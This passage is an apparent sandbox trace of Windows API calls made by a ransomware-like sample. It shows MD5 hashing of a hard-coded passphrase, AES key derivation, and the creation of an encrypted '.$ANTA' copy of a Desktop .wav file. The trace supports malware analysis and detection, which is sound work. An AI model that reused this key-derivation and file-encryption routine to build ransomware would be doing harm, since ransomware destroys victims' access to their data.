CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0125.858] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\tK8Qmak8ns0qz6I3UcG.wav", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37376ed0, ftCreationTime.dwHighDateTime=0x1d5eaa9, ftLastAccessTime.dwLowDateTime=0x382ebf10, ftLastAccessTime.dwHighDateTime=0x1d5e954, ftLastWriteTime.dwLowDateTime=0x382ebf10, ftLastWriteTime.dwHighDateTime=0x1d5e954, nFileSizeHigh=0x0, nFileSizeLow=0xff62, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="tK8Qmak8ns0qz6I3UcG.wav", cAlternateFileName="TK8QMA~1.WAV")) returned 0x41ac500 [0125.858] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0125.858] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0125.858] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0125.858] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0125.858] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.858] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0125.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0125.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0125.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797108, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0125.859] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0125.859] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0125.860] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0125.860] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0125.860] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0125.860] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0125.860] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0125.860] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.860] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0125.860] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0125.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca988, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0125.860] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0125.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0125.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0125.860] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0125.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0125.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0125.861] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.861] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0125.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca7a8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0125.861] CryptHashData (hHash=0x41ac280, pbData=0x17e2b48, dwDataLen=0x22, dwFlags=0x1) returned 1 [0125.861] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.861] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0125.861] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0125.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43caa60, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0125.861] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac280, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac140) returned 1 [0125.861] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.861] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796d68, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0125.862] CryptDestroyHash (hHash=0x41ac280) returned 1 [0125.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0125.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e97a0 [0125.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0125.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0125.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0125.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0125.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0125.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0125.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0125.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0125.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0125.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0125.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0125.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0125.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0125.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0125.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0125.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0125.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0125.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0125.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8ab0 [0125.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0125.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0125.863] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0125.863] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0125.863] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0125.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0125.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0125.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0125.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0125.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0125.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0125.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0125.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0125.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb450 [0125.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0125.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0125.864] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\tK8Qmak8ns0qz6I3UcG.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\tk8qmak8ns0qz6i3ucg.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0125.864] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.864] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0125.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0125.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0125.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0125.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0125.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0125.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0125.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0125.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0125.864] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0125.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0125.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0125.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0125.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0125.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0125.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0125.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0125.865] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0125.865] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0125.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0125.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0125.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0125.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0125.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0125.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0125.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0125.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0125.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0125.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0125.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0125.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0125.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0125.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0125.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0125.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0125.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0125.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0125.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0125.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0125.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0125.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0125.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0125.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0125.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0125.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0125.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0125.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431da28 [0125.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0125.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392570 [0125.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0125.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920a0 [0125.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431da28 | out: hHeap=0x1780000) returned 1 [0125.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0125.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0125.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0125.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0125.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0125.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392570 | out: hHeap=0x1780000) returned 1 [0125.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0125.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0125.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0125.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0125.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0125.867] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0125.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0125.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0125.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920a0 | out: hHeap=0x1780000) returned 1 [0125.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0125.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0125.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0125.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0125.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0125.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0125.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0125.868] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\tK8Qmak8ns0qz6I3UcG.wav.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\tk8qmak8ns0qz6i3ucg.wav.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0125.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0125.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0125.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0125.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0125.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0125.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0125.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0125.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0125.869] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0125.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0125.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0125.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0125.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0125.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0125.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0125.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0125.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0125.869] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0125.869] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0125.869] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0125.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0125.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0125.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0125.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0125.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0125.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0125.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0125.870] RtlAllocateHeap (HeapHandle=0x1780000, 